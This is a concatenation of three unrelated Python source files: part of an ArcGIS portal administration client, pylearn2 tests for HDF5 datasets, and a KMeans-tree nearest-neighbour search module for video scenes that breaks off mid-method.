"""returns the thumbnail value"""
return self._thumbnail
#----------------------------------------------------------------------
@property
def featuredItemsGroupQuery(self):
"""returns the feature Items group query"""
return self._featuredItemsGroupQuery
#----------------------------------------------------------------------
@property
def canSignInIDP(self):
"""return can signin IDP"""
return self._canSignInIDP
#----------------------------------------------------------------------
@property
def storageUsage(self):
"""returns the storage usage"""
return self._storageUsage
#----------------------------------------------------------------------
@property
def rotatorPanels(self):
"""returns the rotator panels"""
return self._rotatorPanels
#----------------------------------------------------------------------
@property
def description(self):
"""returns the portal description"""
return self._description
#----------------------------------------------------------------------
@property
def homePageFeatureContent(self):
"""return home page feature content"""
return self._homePageFeaturedContent
#----------------------------------------------------------------------
@property
def canProvisionDirectPurchase(self):
"""returns the provision direct purchase"""
return self._canProvisionDirectPurchase
#----------------------------------------------------------------------
@property
def canListData(self):
"""returns the canListData value"""
return self._canListData
#----------------------------------------------------------------------
@property
def ipCntryCode(self):
"""returns the ip cntrycode"""
return self._ipCntryCode
#----------------------------------------------------------------------
@property
def user(self):
"""returns the user value"""
return self._user
#----------------------------------------------------------------------
@property
def helpMap(self):
"""returns the helpmap value"""
return self._helpMap
#----------------------------------------------------------------------
@property
def colorSetsGroupQuery(self):
"""returns the colorsets group query"""
return self._colorSetsGroupQuery
#----------------------------------------------------------------------
@property
def canListApps(self):
"""returns the can list apps value"""
return self._canListApps
#----------------------------------------------------------------------
@property
def portalProperties(self):
"""returns the portal properties"""
return self._portalProperties
#----------------------------------------------------------------------
@property
def portalHostname(self):
"""returns the portal hostname"""
return self._portalHostname
#----------------------------------------------------------------------
@property
def useStandardizedQuery(self):
"""returns the user standardized query value"""
return self._useStandardizedQuery
#----------------------------------------------------------------------
@property
def stylesGroupQuery(self):
"""returns the styles group query"""
return self._stylesGroupQuery
#----------------------------------------------------------------------
@property
def symbolSetsGroupQuery(self):
"""returns the symbolsets group query"""
return self._symbolSetsGroupQuery
#----------------------------------------------------------------------
@property
def name(self):
"""returns the portal name"""
return self._name
#----------------------------------------------------------------------
@property
def storageQuota(self):
"""returns the storageQuota value"""
return self._storageQuota
#----------------------------------------------------------------------
@property
def canShareBingPublic(self):
"""returns the canShareBingPublic value"""
return self._canShareBingPublic
#----------------------------------------------------------------------
@property
def maxTokenExpirationMinutes(self):
"""returns the maxTokenExpirationMinutes value"""
return self._maxTokenExpirationMinutes
#----------------------------------------------------------------------
@property
def layerTemplatesGroupQuery(self):
"""returns the layerTemplatesGroupQuery value"""
return self._layerTemplatesGroupQuery
#----------------------------------------------------------------------
@property
def staticImagesUrl(self):
"""returns the staticImagesUrl value"""
return self._staticImagesUrl
#----------------------------------------------------------------------
@property
def databaseUsage(self):
"""returns the databaseUsage value"""
return self._databaseUsage
#----------------------------------------------------------------------
@property
def showHomePageDescription(self):
"""returns the show home page description value"""
return self._showHomePageDescription
#----------------------------------------------------------------------
@property
def availableCredits(self):
"""returns the available credits"""
return self._availableCredits
#----------------------------------------------------------------------
@property
def helperServices(self):
"""returns the helper services"""
return self._helperServices
#----------------------------------------------------------------------
@property
def templatesGroupQuery(self):
"""returns the templates group query"""
return self._templatesGroupQuery
#----------------------------------------------------------------------
@property
def mfaAdmins(self):
"""returns the mfaAdmins value"""
return self._mfaAdmins
#----------------------------------------------------------------------
@property
def basemapGalleryGroupQuery(self):
"""returns the basemap gallery group query"""
return self._basemapGalleryGroupQuery
#----------------------------------------------------------------------
@property
def region(self):
"""returns the portal region value"""
return self._region
#----------------------------------------------------------------------
@property
def portalMode(self):
"""returns the portal's mode"""
return self._portalMode
########################################################################
class UserInvite(object):
"""
represents a user to invite to a user
"""
_username = None
_password = None
_firstName = None
_lastName = None
_fullName = None
_email = None
_role = None
_allowedRole = ["account_publisher", "account_user", "account_admin"]
#----------------------------------------------------------------------
def __init__(self, username, password, firstName, lastName,
email, role="account_user"):
"""Constructor"""
self._username = username
self._password = password
self._firstName = firstName
self._lastName = lastName
self._fullName = firstName + " " + lastName
self._email = email
if role.lower() in self._allowedRole:
self._role = role
else:
raise AttributeError("Invalid Role: %s" % role)
#----------------------------------------------------------------------
@property
def value(self):
"""returns object as dictionary"""
return {
"username": self._username,
"password": self._password,
"firstname": self._firstName,
"lastname": self._lastName,
"fullname":self.fullName,
"email":self._email,
"role":self.role
}
#----------------------------------------------------------------------
def __str__(self):
"""object as a string"""
return json.dumps(self.value)
#----------------------------------------------------------------------
@property
def firstName(self):
"""gets/sets the first name"""
return self._firstName
#----------------------------------------------------------------------
@firstName.setter
def firstName(self, value):
"""gets/sets the first name"""
if self._firstName != value:
self._firstName = value
#----------------------------------------------------------------------
@property
def lastName(self):
"""gets/sets the last name"""
return self._lastName
#----------------------------------------------------------------------
@lastName.setter
def lastName(self, value):
"""gets/sets the last name"""
if self._lastName != value:
self._lastName = value
#----------------------------------------------------------------------
@property
def email(self):
"""gets/sets the email"""
return self._email
#----------------------------------------------------------------------
@email.setter
def email(self, value):
"""gets/sets the email"""
if self._email != value:
self._email = value
#----------------------------------------------------------------------
@property
def password(self):
"""gets/sets the password"""
return self._password
#----------------------------------------------------------------------
@password.setter
def password(self, value):
"""gets/sets the password"""
if self._password != value:
self._password = value
#----------------------------------------------------------------------
@property
def username(self):
"""gets/sets the user name"""
return self._username
#----------------------------------------------------------------------
@username.setter
def username(self, value):
"""gets/sets the user name"""
if self._username != value:
self._username = value
#----------------------------------------------------------------------
@property
def role(self):
"""gets/sets the role name"""
return self._role
#----------------------------------------------------------------------
@role.setter
def role(self, value):
"""gets/sets the role name"""
if self._role != value and \
self._role.lower() in self._allowedRole:
self._role = value
#----------------------------------------------------------------------
@property
def fullName(self):
"""gets the full name of the user"""
return self._firstName + " " + self._lastName
########################################################################
class Portals(BaseAGOLClass):
"""
provides access to the portals' child resources.
"""
_baseURL = None
_url = None
_securityHandler = None
_proxy_port = None
_proxy_url = None
_portalId = None
#----------------------------------------------------------------------
def __init__(self,
url,
portalId=None,
securityHandler=None,
proxy_url=None,
proxy_port=None):
"""Constructor"""
if url.lower().find("/portals") < 0:
url = url + "/portals"
self._baseURL = url
self._proxy_port = proxy_port
self._proxy_url = proxy_url
self._securityHandler = securityHandler
if not securityHandler is None:
self._referer_url = securityHandler.referer_url
if portalId is not None:
self._portalId = portalId
self._url = url + "/%s" % portalId
self._referer_url = securityHandler.referer_url
else:
portalId = self._findPortalId()
self._portalId = portalId
self._url = url + "/%s" % portalId
self._referer_url = securityHandler.referer_url
#----------------------------------------------------------------------
def _findPortalId(self):
"""gets the portal id for a site if not known."""
url = self._baseURL + "/self"
params = {
"f" : "json",
"token" : self._securityHandler.token
}
res = self._do_get(url=url, param_dict=params,
proxy_port=self._proxy_port,
proxy_url=self._proxy_url)
if res.has_key('id'):
return res['id']
else:
raise AttributeError("Invalid URL or token")
#----------------------------------------------------------------------
@property
def portalId(self):
"""gets the portal Id"""
if self._portalId is None:
self._findPortalId()
return self._portalId
#----------------------------------------------------------------------
@property
def urls(self):
"""gets the hosting server information"""
if self._portalId is None:
self._findPortalId()
url = self._baseURL + "/%s/urls" % self._portalId
params = {
"f" : "json",
"token" : self._securityHandler.token
}
return self._do_get(url=url, param_dict=params, proxy_url=self._proxy_url,
proxy_port=self._proxy_port)
#----------------------------------------------------------------------
@property
def featureServers(self):
"""gets the hosting feature AGS Server"""
if self.urls == {}:
return {}
return self.urls["urls"]['features']
#----------------------------------------------------------------------
@property
def tileServers(self):
"""gets the tile server base urls"""
if self.urls == {}:
return {}
return self.urls["urls"]['tiles']
#----------------------------------------------------------------------
@property
def portalRoot(self):
""" returns the base url without the portal id """
return self._baseURL
#----------------------------------------------------------------------
def addResource(self, key, filePath, text):
"""
The add resource operation allows the administrator to add a file
resource, for example, the organization's logo or custom banner.
The resource can be used by any member of the organization. File
resources use storage space from your quota and are scanned for
viruses.
Inputs:
key - The name the resource should be stored under.
filePath - path of file to upload
text - Some text to be written (for example, JSON or JavaScript)
directly to the resource from a web client.
"""
url = self._url + "/addresource"
params = {
"f": "json",
"token" : self._securityHandler.token,
"key" : key,
"text" : text
}
parsed = urlparse.urlparse(url)
files = []
files.append(('file', filePath, os.path.basename(filePath)))
res = self._post_multipart(host=parsed.hostname,
selector=parsed.path,
files = files,
fields=params,
port=parsed.port,
ssl=parsed.scheme.lower() == 'https',
proxy_port=self._proxy_port,
proxy_url=self._proxy_url)
return res
#----------------------------------------------------------------------
def checkServiceName(self,
name,
serviceType):
"""
Checks to see if a given service name and type are available for
publishing a new service. true indicates that the name and type is
not found in the organization's services and is available for
publishing. false means the requested name and type are not available.
Inputs:
name - requested name of service
serviceType - type of service allowed values: Feature Service or
Map Service
"""
_allowedTypes = ['Feature Service', "Map Service"]
url = self._url + "/isServiceNameAvailable"
params = {
"f" : "json",
"token" : self._securityHandler.token,
"name" : name,
"type" : serviceType
}
return self._do_get(url=url,
param_dict=params,
proxy_url=self._proxy_url,
proxy_port=self._proxy_port)
#----------------------------------------------------------------------
def inviteUser(self, invitationList, html, subject):
"""Invites a user or users to a site.
Inputs:
invitationList - either an UserInvite object or a list of
UserInvite object.
html - text of invite email with HTML formatting
subject - subject of email to send
"""
url = self._baseURL + "/self/invite"
params = {
"f" : "json",
"token" : self._securityHandler.token,
"html" : html,
"subject" : subject
}
if isinstance(invitationList, UserInvite):
params['invitationList'] = {"invitations":[invitationList.value]}
elif isinstance(invitationList, list) and \
isinstance(invitationList[0], UserInvite):
params['invitationList'] = {"invitations":[iL.value for iL in invitationList]}
return self._do_post(url=url, param_dict=params,
proxy_url=self._proxy_url,
proxy_port=self._proxy_port)
#----------------------------------------------------------------------
@property
def languages(self):
""" list of available languages """
url = self._url + "/languages"
params = {
"f" : "json",
"token" : self._securityHandler.token,
}
return self._do_get(url=url,
param_dict=params,
proxy_url=self._proxy_url,
proxy_port=self._proxy_port)
#----------------------------------------------------------------------
@property
def portalProperties(self):
"""
Portal returns information on your organization and is accessible
to administrators. Publishers and information workers can view
users and resources of the organization.
"""
url = self._url
params = {
"f" : "json",
"token" : self._securityHandler.token
}
return self._do_get(url=url,
param_dict=params,
proxy_url=self._proxy_url,
proxy_port=self._proxy_port)
#----------------------------------------------------------------------
def portalSelf(self, culture=None, region=None):
"""
The Portal Self resource is used to return the view of the portal
as seen by the current user, anonymous or logged in. It includes
information such as the name, logo, featured items, and supported
protocols (HTTP vs. HTTPS) for this portal. If the user is not
logged in, this call will return the default view of the portal. If
the user is logged in, the view of the returned portal will be
specific to the organization to which the user belongs. The default
view of the portal is dependent on the culture of the user, which
is obtained from the user's profile. A parameter to pass in the
locale/culture is available for anonymous users.
Inputs:
culture - the culture code of the calling client output is
customized for this culture if settings are available
region - the region code of the calling client.
"""
url = self._url + "/self"
params = {
"f" : "json",
"token" : self._securityHandler.token,
}
if culture is not None:
params['culture'] = culture
if region is not None:
params['region'] = region
res = self._do_get(url=url,
param_dict=params,
proxy_url=self._proxy_url,
proxy_port=self._proxy_port)
ps = PortalSelf(res)
return ps
#----------------------------------------------------------------------
@property
def regions(self):
"""
Lists the available regions
"""
url = self._url + "/regions"
params = {
"f" : "json",
"token" : self._securityHandler.token
}
return self._do_get(url=url,
param_dict=params,
proxy_url=self._proxy_url,
proxy_port=self._proxy_port)
#----------------------------------------------------------------------
def registerServer(self,
name,
url,
adminUrl,
isHosted,
serverType):
"""
You can optionally register (or "federate") an ArcGIS Server site
with your Portal for ArcGIS deployment. This provides the
following benefits:
The server and the portal share the same user store (that of
the portal). This results in a convenient single sign-on
experience.
Any items you publish to the server are automatically shared
on the portal.
You can optionally allow the server to host tiled map services
and feature services published by portal users.
After you register a server with your portal, you must invoke the
Update Security Configuration operation on the ArcGIS Server site
and configure the site's security store to take advantage of users
and roles from the portal.
This operation is only applicable to Portal for ArcGIS; it is not
supported with ArcGIS Online.
Inputs:
name - The fully qualified name of the machine hosting the
ArcGIS Server site, followed by the port.
url - The externally visible URL of the ArcGIS Server site,
using the fully qualified name of the machine.
adminUrl - The administrative URL of your ArcGIS Server site,
using the fully qualified name of the machine.
isHosted - A Boolean property denoting whether the ArcGIS Server
site will be allowed to host services for the portal
(true) or not be allowed to host services (false).
serverType - The type of server being registered with the portal
For example: ArcGIS.
"""
url = self._url + "/register"
params = {
"f" : "json",
"token" : self._securityHandler.token,
"url" : url,
"adminUrl" : adminUrl,
"isHosted" : isHosted,
"name" : name,
"serverType" : serverType
}
return self._do_get(url=url,
param_dict=params,
proxy_url=self._proxy_url,
proxy_port=self._proxy_port)
#----------------------------------------------------------------------
def removeResource(self, key):
"""
The Remove Resource operation allows the administrator to remove a
file resource.
Input:
key - name of resource to delete
"""
url = self._url + "/removeresource"
params = {
"key" : key,
"f" : "json",
"token" : self._securityHandler.token
}
return self._do_get(url=url,
param_dict=params,
proxy_url=self._proxy_url,
proxy_port=self._proxy_port)
#----------------------------------------------------------------------
def removeUser(self, users):
"""
The Remove Users operation allows the administrator to remove users
from a portal. Before the administrator can remove the user, all of
the user's content and groups must be reassigned or deleted.
Inputs:
users - Comma-separated list of usernames to remove.
"""
url = self._url + "/removeusers"
params = {
"f" : "json",
"token" : self._securityHandler.token,
"users" : users
}
return self._do_post(url=url, param_dict=params,
proxy_url=self._proxy_url,
proxy_port=self._proxy_port)
#----------------------------------------------------------------------
def resources(self,
start=1,
num=10):
"""
Resources lists all file resources for the organization. The start
and num paging parameters are supported.
Inputs:
start - the number of the first entry in the result set response
The index number is 1-based and the default is 1
num - the maximum number of results to be returned as a whole #
"""
url = self._url + "/resources"
params = {
"f" : "json",
"token" : self._securityHandler.token,
"start" : start,
"num" : num
}
return self._do_get(url=url,
param_dict=params,
proxy_url=self._proxy_url,
proxy_port=self._proxy_port)
#----------------------------------------------------------------------
def server(self, serverId):
"""
This resource represents an ArcGIS Server site that has been
federated with the portal.
This resource is not applicable to ArcGIS Online; it is only
applicable to Portal for ArcGIS.
"""
url = self._url + "/servers/%s" % serverId
params = {
"f" : "json",
"token" : self._securityHandler.token
}
return self._do_get(url=url,
param_dict=params,
proxy_url=self._proxy_url,
proxy_port=self._proxy_port)
#----------------------------------------------------------------------
@property
def servers(self):
"""
This resource lists the ArcGIS Server sites that have been
federated with the portal. This resource is not applicable to
ArcGIS Online; it is only applicable to Portal for ArcGIS.
"""
url = self._url + "/servers"
params = {
"f" : "json",
"token" : self._securityHandler.token
}
return self._do_get(url=url,
param_dict=params,
proxy_url=self._proxy_url,
proxy_port=self._proxy_port)
#----------------------------------------------------------------------
def unregisterServer(self, serverId):
"""
This operation unregisters an ArcGIS Server site from the portal.
The server is no longer federated with the portal after this
operation completes.
After this operation completes, you must invoke the Update Security
Configuration operation on your ArcGIS Server site to specify how
you want the server to work with users and roles.
Inputs:
serverId - unique identifier of the server
"""
url = self._url + "/servers/%s/unregister" % serverId
params = {
"f" : "json",
"token" : self._securityHandler.token
}
return self._do_post(url=url,
param_dict=params,
proxy_url=self._proxy_url,
proxy_port=self._proxy_port)
#----------------------------------------------------------------------
def update(self,
updatePortalParameters,
clearEmptyFields=False):
"""
The Update operation allows administrators only to update the
organization information such as name, description, thumbnail, and
featured groups.
Inputs:
updatePortalParamters - parameter.PortalParameters object that holds information to update
clearEmptyFields - boolean that clears all whitespace from fields
"""
url = self._url + "/update"
params = {
"f" : "json",
"token" : self._securityHandler.token,
"clearEmptyFields" : clearEmptyFields
}
if isinstance(updatePortalParameters, parameters.PortalParameters):
params.update(updatePortalParameters.value)
else:
raise AttributeError("updatePortalParameters must be of type parameter.PortalParameters")
return self._do_post(url=url,
param_dict=params,
proxy_url=self._proxy_url,
proxy_port=self._proxy_port)
#----------------------------------------------------------------------
def updateServer(self,
serverId,
name,
url,
adminUrl,
isHosted,
serverType):
"""
This operation updates the properties of an ArcGIS Server site that
has been registered, or federated, with the portal. For example,
you can use this operation to change the federated site that acts
as the portal's hosting server.
Inputs:
serverId - identifier of server to update.
name - The fully qualified name of the machine hosting the
ArcGIS Server site, followed by the port.
url - The externally visible URL of the ArcGIS Server site,
using the fully qualified name of the machine.
adminUrl - The administrative URL of the ArcGIS Server site,
using the fully qualified name of the machine.
isHosted - A Boolean property denoting whether the ArcGIS Server
site will be allowed to host services for the portal
(true) or will not be allowed to host services
(false).
serverType - The type of server being registered with the portal
For example: ArcGIS.
"""
url = self._url + "/%s/update" % serverId
params = {
"name" : name,
"url" : url,
"adminUrl" : adminUrl,
"isHosted" : isHosted,
"serverType" : serverType
}
return self._do_post(url=url,
param_dict=params,
proxy_url=self._proxy_url,
proxy_port=self._proxy_port)
#----------------------------------------------------------------------
def updateUserRole(self,
user,
role):
"""
The Update User Role operation allows the administrator of an org
anization to update the role of a user within a portal.
Inputs:
role - Sets the user's role.
Roles are the following:
org_user - Ability to add items, create groups, and
share in the organization.
org_publisher - Same privileges as org_user plus the
ability to publish hosted services from ArcGIS for
Desktop and ArcGIS Online.
org_admin - In addition to add, create, share, and publish
capabilities, an org_admin administers and customizes
the organization.
Example: role=org_publisher
user - The username whose role you want to change.
"""
url = self._url + "/updateuserrole"
params = {
"f" : "json",
"token" : self._securityHandler.token,
"user" : user,
"role" : role
}
return self._do_post(url=url,
param_dict=params,
proxy_url=self._proxy_url,
proxy_port=self._proxy_port)
#----------------------------------------------------------------------
def users(self, start=1, num=10):
"""
Lists all the members of the organization. The start and num paging
parameters are supported.
Inputs:
start - The number of the first entry in the result set response.
The index number is 1-based.
The default value of start is 1 (that is, the first
search result).
The start parameter, along with the num parameter, can
be used to paginate the search results.
num - The maximum number of results to be included in the result
set response.
The default value is 10, and the maximum allowed value is
100.The start parameter, along with the num parameter, can
be used to paginate the search results.
"""
url = self._url + "/users"
params = {
"f" : "json",
"token" : self._securityHandler.token,
"start" : start,
"num" : num
}
return self._do_post(url=url,
param_dict=params,
proxy_url=self._proxy_url,
proxy_port=self._proxy_port)
|
|
"""
HDF5 dataset tests.
"""
import numpy as np
import os
import tempfile
from pylearn2.config import yaml_parse
from pylearn2.testing.datasets import (
random_dense_design_matrix,
random_one_hot_dense_design_matrix,
random_one_hot_topological_dense_design_matrix)
from pylearn2.testing.skip import skip_if_no_h5py
def test_hdf5_design_matrix():
"""Train using an HDF5 dataset."""
skip_if_no_h5py()
import h5py
# save random data to HDF5
handle, filename = tempfile.mkstemp()
dataset = random_one_hot_dense_design_matrix(np.random.RandomState(1),
num_examples=10, dim=5,
num_classes=3)
with h5py.File(filename, 'w') as f:
f.create_dataset('X', data=dataset.get_design_matrix())
f.create_dataset('y', data=dataset.get_targets())
# instantiate Train object
trainer = yaml_parse.load(design_matrix_yaml % {'filename': filename})
trainer.main_loop()
# cleanup
os.remove(filename)
def test_hdf5_topo_view():
"""Train using an HDF5 dataset with topo_view instead of X."""
skip_if_no_h5py()
import h5py
# save random data to HDF5
handle, filename = tempfile.mkstemp()
dataset = random_one_hot_topological_dense_design_matrix(
np.random.RandomState(1), num_examples=10, shape=(2, 2), channels=3,
axes=('b', 0, 1, 'c'), num_classes=3)
with h5py.File(filename, 'w') as f:
f.create_dataset('topo_view', data=dataset.get_topological_view())
f.create_dataset('y', data=dataset.get_targets())
# instantiate Train object
trainer = yaml_parse.load(topo_view_yaml % {'filename': filename})
trainer.main_loop()
# cleanup
os.remove(filename)
def test_hdf5_convert_to_one_hot():
"""Train using an HDF5 dataset with one-hot target conversion."""
skip_if_no_h5py()
import h5py
# save random data to HDF5
handle, filename = tempfile.mkstemp()
dataset = random_dense_design_matrix(np.random.RandomState(1),
num_examples=10, dim=5, num_classes=3)
with h5py.File(filename, 'w') as f:
f.create_dataset('X', data=dataset.get_design_matrix())
f.create_dataset('y', data=dataset.get_targets())
# instantiate Train object
trainer = yaml_parse.load(convert_to_one_hot_yaml % {'filename': filename})
trainer.main_loop()
# cleanup
os.remove(filename)
def test_hdf5_load_all():
"""Train using an HDF5 dataset with all data loaded into memory."""
skip_if_no_h5py()
import h5py
# save random data to HDF5
handle, filename = tempfile.mkstemp()
dataset = random_one_hot_dense_design_matrix(np.random.RandomState(1),
num_examples=10, dim=5,
num_classes=3)
with h5py.File(filename, 'w') as f:
f.create_dataset('X', data=dataset.get_design_matrix())
f.create_dataset('y', data=dataset.get_targets())
# instantiate Train object
trainer = yaml_parse.load(load_all_yaml % {'filename': filename})
trainer.main_loop()
# cleanup
os.remove(filename)
design_matrix_yaml = """
!obj:pylearn2.train.Train {
dataset: &train !obj:pylearn2.datasets.hdf5.HDF5Dataset {
filename: %(filename)s,
X: X,
y: y,
},
model: !obj:pylearn2.models.mlp.MLP {
layers: [
!obj:pylearn2.models.mlp.Sigmoid {
layer_name: h0,
dim: 10,
irange: .005,
},
!obj:pylearn2.models.mlp.Softmax {
layer_name: y,
n_classes: 3,
irange: 0.
}
],
nvis: 5,
},
algorithm: !obj:pylearn2.training_algorithms.sgd.SGD {
batch_size: 5,
learning_rate: .1,
monitoring_dataset:
{
'train' : *train,
},
termination_criterion:
!obj:pylearn2.termination_criteria.EpochCounter {
max_epochs: 1,
},
},
}
"""
topo_view_yaml = """
!obj:pylearn2.train.Train {
dataset: &train !obj:pylearn2.datasets.hdf5.HDF5Dataset {
filename: %(filename)s,
topo_view: topo_view,
y: y,
},
model: !obj:pylearn2.models.mlp.MLP {
layers: [
!obj:pylearn2.models.mlp.Sigmoid {
layer_name: h0,
dim: 10,
irange: .005,
},
!obj:pylearn2.models.mlp.Softmax {
layer_name: y,
n_classes: 3,
irange: 0.
}
],
nvis: 12,
},
algorithm: !obj:pylearn2.training_algorithms.sgd.SGD {
batch_size: 5,
learning_rate: .1,
monitoring_dataset:
{
'train' : *train,
},
termination_criterion:
!obj:pylearn2.termination_criteria.EpochCounter {
max_epochs: 1,
},
},
}
"""
convert_to_one_hot_yaml = """
!obj:pylearn2.train.Train {
dataset: &train !obj:pylearn2.datasets.hdf5.HDF5Dataset {
filename: %(filename)s,
X: X,
y: y,
y_labels: 3
},
model: !obj:pylearn2.models.mlp.MLP {
layers: [
!obj:pylearn2.models.mlp.Sigmoid {
layer_name: h0,
dim: 10,
irange: .005,
},
!obj:pylearn2.models.mlp.Softmax {
layer_name: y,
n_classes: 3,
irange: 0.
}
],
nvis: 5,
},
algorithm: !obj:pylearn2.training_algorithms.sgd.SGD {
batch_size: 5,
learning_rate: .1,
monitoring_dataset:
{
'train' : *train,
},
termination_criterion:
!obj:pylearn2.termination_criteria.EpochCounter {
max_epochs: 1,
},
},
}
"""
load_all_yaml = """
!obj:pylearn2.train.Train {
dataset: &train !obj:pylearn2.datasets.hdf5.HDF5Dataset {
filename: %(filename)s,
X: X,
y: y,
load_all: 1,
},
model: !obj:pylearn2.models.mlp.MLP {
layers: [
!obj:pylearn2.models.mlp.Sigmoid {
layer_name: h0,
dim: 10,
irange: .005,
},
!obj:pylearn2.models.mlp.Softmax {
layer_name: y,
n_classes: 3,
irange: 0.
}
],
nvis: 5,
},
algorithm: !obj:pylearn2.training_algorithms.sgd.SGD {
batch_size: 5,
learning_rate: .1,
monitoring_dataset:
{
'train' : *train,
},
termination_criterion:
!obj:pylearn2.termination_criteria.EpochCounter {
max_epochs: 1,
},
},
}
"""
|
|
import numpy as npy
import random as rand
import sys
import Queue
import pickle
import math
import os.path
import math
import threading
import processhandler
import time
from pymongo import MongoClient
FILE_TREE = "_tree.db"
FILE_DEL = "_deletedVideos.db"
FILE_ADD = "_addedScenes.db"
lock = threading.Lock()
"""
Returns children for the given arguments.
They are most of the times don't have childs
of there own yet but if so there is a second
return value with the data the subchilds will
be made off.
@param data [(features, key),...] List of pairs of features and keys
@param k Giving the max amount of leaves a node should have
@param maxiterations limiting the iterations for the center finding
@param recdepth Don't mind me. Debuggin reasons
@return [(child, data)], where data is None if the child is a leave
"""
def buildTree(data, k, maxiterations, recdepth = 0):
# Output to get a feeling how long it takes (a long time)
# 76 minutes for 1.000.000 entries with 1024 vectors
align = ""
for i in range(recdepth):
align += " "
print align, recdepth, ": len(data): ", len(data)
# Get random centers as starting point
centers = calg(data,k)
centersFound = False
iterations = 0
# Improve the centers
while not centersFound and iterations < maxiterations:
iterations += 1
clusters = []
for _ in range(len(centers)):
clusters.append([])
# cluster the points around the closest centers
for position,value in data:
index = 0
mindist = sys.maxint
for i,center in enumerate(centers):
distance = dist(position, center)
if distance < mindist:
mindist = distance
index = i
clusters[index].append((position, value))
centersNew = []
# calculate new centers
for cluster in clusters:
if not cluster == []:
center = npy.mean(npy.transpose([i[0] for i in cluster]), axis=1, dtype=npy.int)
centersNew.append(center)
if len(centersNew) == 1:
tmp = [[] for i in range(k)]
for i,v in enumerate(clusters[0]):
tmp[i%k].append(v)
res = []
for cluster in tmp:
if len(cluster) < k:
child = KMeansTree(True, center, cluster)
res.append((child, None))
else:
child = KMeansTree(False, center, [])
res.append((child, cluster))
return res
# Check if the centers changed
if npy.array_equal(centers, centersNew):
centersFound = True
centers = centersNew
res = []
for center,cluster in zip(centers,clusters):
if len(cluster) < k:
# Create a child for each cluster
child = KMeansTree(True, center, cluster)
res.append((child, None))
else:
child = KMeansTree(False, center, [])
res.append((child, cluster))
return res
"""
Builds a tree, multithreaded (processed)
@param result Result of the last build. So it't really rather the tasts that there are
@param parent Parent of the childs in result
@param processHandler Object to create processes
@param k k the split factor for the tree
@param maxiterations maxiterations factor for the tree
@param recdepth Debugging reasons
"""
def treeBuilder(result, parent, processHandler, k, maxiterations, recdepth=0):
for (tree,data) in result:
if not tree.isLeave:
if len(data) < 42:
res = buildTree(data=data, k=k, maxiterations=maxiterations, recdepth=recdepth)
treeBuilder(result=res, parent=tree, processHandler=processHandler, k=k, maxiterations=maxiterations, recdepth=recdepth)
else:
processHandler.runTask(priority=1, onComplete=treeBuilder, onCompleteArgs=(), onCompleteKwargs={"parent":tree, "processHandler":processHandler, "k":k, "maxiterations":maxiterations, "recdepth":recdepth}, target=buildTree, args=(), kwargs={"data":data, "k":k, "maxiterations":maxiterations, "recdepth":recdepth}, name=None)
lock.acquire()
try:
for (tree,_) in result:
if parent != None:
parent.children.append(tree)
finally:
lock.release()
class KMeansTree:
isLeave = False
center = []
# When leave this field is abused for the data
children = []
def __init__(self, isLeave, center, children):
self.isLeave = isLeave
self.center = center
self.children = children
"""
Searches in the tree
@param query Feature array for the request. Find NNs to this one
@param deletedVideos Dictornary containing videos which shouldn't be found
@param wantedNNs Amount of NNs to be found
@param maxPointsToTouch Limit of leaves that get touched. Higher value -> better results but slower calculation
@return Priority Queue with the results
"""
def search(self, query, deletedVideos, wantedNNs=1, maxPointsToTouch=42):
# for the nodes that get checked later
nextNodes = Queue.PriorityQueue()
# for the results
results = Queue.PriorityQueue()
# search from root
self.traverse(nextNodes, results, query, deletedVideos)
# while there are nextNodes and the max amount of points or the number of NNs is not reached
while (not nextNodes.empty()) and (results.qsize() < maxPointsToTouch or results.qsize() < wantedNNs):
# get the next clostest node
_,nextNode = nextNodes.get()
# and continue searching there
nextNode.traverse(nextNodes, results, query, deletedVideos)
res = []
for i in range(wantedNNs):
if results.empty():
return res
res.append(results.get())
return res
"""
Travereses the tree for the search
@param nextNodes PrioQueue for 'checkout-later'-nodes
@param results PrioQueue for the results
@param query Feature array for the request. Find NNs to this one.
@param deletedVideos Dictornary containing videos which shouldn't be found
"""
def traverse(self, nextNodes, results, query, deletedVideos):
if self.isLeave:
# put the leave to the results
for center,value in self.children:
if not value[0] in deletedVideos:
results.put((dist(query, center),value))
else:
# find the closest child
closestChild = None
mindist = sys.maxint
for child in self.children:
distance = dist(child.center, query)
if distance < mindist:
# add the previously clostest child to the later to check nodes
# doing that all but the actual closest child should get added
if not closestChild == None:
nextNodes.put((mindist,closestChild))
mindist = distance
# set new closest child
closestChild = child
else:
# add the child to the later to check nodes
nextNodes.put((distance,child))
if closestChild == None:
return
# go on searching in the closest child
closestChild.traverse(nextNodes, results, query, deletedVideos)
"""
To String for debugging
"""
def __str__(self):
return self.str2("")
def str2(self,i):
retval = i
if self.isLeave:
retval += i + " [" + str(self.children) + " - " + str(self.center) + "]"
else:
retval += "Node:[" + str(self.center) + "\n"
for c in self.children:
retval += c.str2(i + " ") + "\n"
retval += i + "]"
return retval
# Calculate the euclidian distance between two arrays
def dist(array1, array2):
return npy.linalg.norm(array1 - array2)
# TODO: Crappy center selection algorithm. Should be replaced with something cooler.
def calg(arr,k):
result = []
N = 0
for x,_ in arr:
N += 1
if len(result) < k:
result.append(x)
else:
s = int(rand.random() * N)
if s < k:
result[s] = x
return result
class SearchHandler:
# Name for the filenames
name = None
# Collection containing the videos
videos = None
# Weigth for the faltening
featureWeight = 0.5
# KMeans-Tree
tree = None
# List for now
addedScenes = []
# Dict of all videos that shouldn't be found
deletedVideos = dict()
# ProcessHander for multiprocessing
processHandler = None
# Shadow copy to keep it updated
shadowCopy = None
#not the actual maximal distance between vectors, but anything beyond this distance is no match at all
max_dist = 1100.0 # average distance is normalized to 1000, something with average distance is a match of 10%
"""
Loads a tree from a file if the file exists, else it
builds the tree from a given a collection containing videodata
Use self.processHandler.waitForPriority(priority=1, waitTime=10) to wait till the tree is fully build.
This module assumes that you never build more than one tree at once.
@param videos The collection
@param filename filename of the tree
@param k Splittingfactor k
@param imax max iterations for the center finding
@param forceRebuild If true the tree will get rebuild no matter if the files exist
"""
def __init__(self, videos, name, featureWeight=0.5, processHandler=None):
if not (featureWeight >= 0.0 and featureWeight <= 1.0):
print ("Illegal weight parameter (" + str(featureWeight) + "), defaulting to 0.5/0.5\n")
featureWeight = 0.5
self.name = name
self.videos = videos
self.featureWeight = featureWeight
self.processHandler = processHandler
self.shadowCopy = None
self.addedScenes = []
self.deletedVideos = dict()
"""
Loads the tree or builds it if needed/requested
@param k Splitfactor for the tree
@param imax iterations factor for the tree
@param forceRebuild if true the tree won't be loaded even if one exists
"""
def loadOrBuildTree(self, k=8, imax=100, forceRebuild=False):
# Try to load the tree from the file
